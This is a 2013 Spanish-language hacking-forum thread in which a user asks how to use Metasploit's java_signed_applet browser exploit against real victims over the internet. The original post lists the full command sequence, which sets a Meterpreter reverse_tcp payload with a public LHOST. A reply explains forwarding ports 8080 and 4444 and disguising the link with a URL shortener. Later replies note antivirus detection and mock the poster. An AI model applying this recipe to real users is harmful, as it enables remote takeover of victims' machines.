elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  metasploit DUDA ataque real !
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: metasploit DUDA ataque real !  (Leído 12,405 veces)
Socket

Desconectado Desconectado

Mensajes: 4



Ver Perfil
metasploit DUDA ataque real !
« en: 14 Septiembre 2013, 13:58 pm »

buenas bros queria saber sobre este bug java_apllets es como un payload que ataka via internet mediante metasploit pero no lo entiendo ???????????

preguntas del video ?

primero abre los puertos 4444 y 8080
por que abre el puerto 8080 ese puerto no es para proxys o para servidores ?

otra cosa la victima tiene que tener instalado JAVA para que funke el ataque ?

y no entiendo para que sirve este website para crear un servidor ?
http://tinyurl.com/create.php
segun el video pone la ip publica .. como LHOST

cuando lo abro en otra maquina sale asi y no me da session a de cuenta que la web no me diera respuesta o
httt://tinyurl.com/194.123.77.33:8080/ me sale asi en la maquina atacada



ya intente con troyanos y me fue bien quiero hacer esto alguien quien me pueda ayudar hacer el ataque por favor




pasos del ataque :

use exploit/multi/browser/java_signed_applet

show options

set SRVHOST 192.168.1.9

set URIPATH /

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST 194.123.77.33 IP PUBLICA


exploit
« Última modificación: 14 Septiembre 2013, 14:00 pm por Socket » En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: metasploit DUDA ataque real !
« Respuesta #1 en: 14 Septiembre 2013, 19:03 pm »

Creo que bug java_applet es el exploit, payload es otra cosa.
tinyurl.com, es una pagina acortadora de links
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: metasploit DUDA ataque real !
« Respuesta #2 en: 14 Septiembre 2013, 19:29 pm »

Primero de todo lo que hace es meter un server local, luego si usas router rediriges los puertos de la shell y el server (8080, 4444) a tu ip interna, luego cojes tu ip externa la pasas por tiny url o por dodnde quieras y ya esta, pero dudo que te funcione así por las buenas, mucho firewall y antivirus hay.
En línea

Socket

Desconectado Desconectado

Mensajes: 4



Ver Perfil
Re: metasploit DUDA ataque real !
« Respuesta #3 en: 14 Septiembre 2013, 23:34 pm »

Primero de todo lo que hace es meter un server local, luego si usas router rediriges los puertos de la shell y el server (8080, 4444) a tu ip interna, luego cojes tu ip externa la pasas por tiny url o por dodnde quieras y ya esta, pero dudo que te funcione así por las buenas, mucho firewall y antivirus hay.

Espera por que dices que el firewall y el antivirus ? como en el video si sale bro explicame eso sabes de algun ataque real con reverse shell o payload algo parecido ?
En línea

xustyx

Desconectado Desconectado

Mensajes: 213


Ver Perfil
Re: metasploit DUDA ataque real !
« Respuesta #4 en: 15 Septiembre 2013, 02:46 am »

Acabo de probarla en red local y el avast salta con el exploit (se veia venir...). Al del video le debe salir porque el que infecta seguramente no tenga antivirus ni nada por el estilo.
En línea

beholdthe


Desconectado Desconectado

Mensajes: 2.736


Ver Perfil
Re: metasploit DUDA ataque real !
« Respuesta #5 en: 17 Septiembre 2013, 01:25 am »

Normal que salte el antivirus. Tendría narices que no saltara con ese exploit.
En línea

Socket

Desconectado Desconectado

Mensajes: 4



Ver Perfil
Re: metasploit DUDA ataque real !
« Respuesta #6 en: 17 Septiembre 2013, 15:36 pm »

en serio salta el antivurus o no salta ?
En línea

beholdthe


Desconectado Desconectado

Mensajes: 2.736


Ver Perfil
Re: metasploit DUDA ataque real !
« Respuesta #7 en: 18 Septiembre 2013, 01:18 am »

en serio salta el antivurus o no salta ?
En Metasploit eres bastante nuevo ¿verdad?
Deberías leer algo mas sobre como funciona y como es. En este foro hay mucha información sobre el tema. Estoy seguro que cuando leas algo mas, evitaras hacer este tipo de preguntas TAN OBVIAS.
En línea

MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: metasploit DUDA ataque real !
« Respuesta #8 en: 4 Octubre 2013, 15:31 pm »

Ultimamente el foro esta lleno de lamers...
En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
Tyrz


Desconectado Desconectado

Mensajes: 927


Get big or die tryin'


Ver Perfil WWW
Re: metasploit DUDA ataque real !
« Respuesta #9 en: 4 Octubre 2013, 15:38 pm »

y de gente que borde que parece responder con asco, hay formas y formas
En línea

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ATAQUE CON METASPLOIT + RADMIN = CONTROL TOTAL (Video)
Hacking
kiaro 6 11,066 Último mensaje 8 Febrero 2010, 03:15 am
por Shell Root
[Video Aula] Metasploit & Nmap - ataque automatizado
Hacking
Bhior 4 7,041 Último mensaje 14 Mayo 2010, 21:44 pm
por Debci
acceso con metasploit en el mundo real
Hacking
feedf 3 3,167 Último mensaje 22 Noviembre 2016, 08:40 am
por Zedmix
Ataque a Android con Metasploit
Ingeniería Inversa
Iceberg 1 3,656 Último mensaje 18 Julio 2017, 17:37 pm
por apuromafo CLS
Utilidad real de Metasploit, msfvenom, etc.
Análisis y Diseño de Malware
4v1dy4 5 5,561 Último mensaje 10 Abril 2024, 07:13 am
por mrx13hacker 💣
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines